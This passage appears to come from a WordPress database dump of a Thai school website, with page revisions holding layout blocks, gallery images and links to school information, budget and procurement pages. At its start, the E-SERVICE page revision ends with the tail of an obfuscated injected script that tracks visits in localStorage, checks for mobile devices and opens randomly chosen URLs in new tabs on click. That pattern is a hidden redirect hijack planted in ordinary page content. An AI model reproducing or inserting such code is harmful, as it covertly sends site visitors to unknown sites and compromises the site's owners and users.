_0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 09:46:35','2025-07-03 02:46:35','',459,'http://pakhaeng.ssk.in.th/?p=1635',0,'revision','',0),
(1636,1,'2025-07-03 09:47:18','2025-07-03 02:47:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a 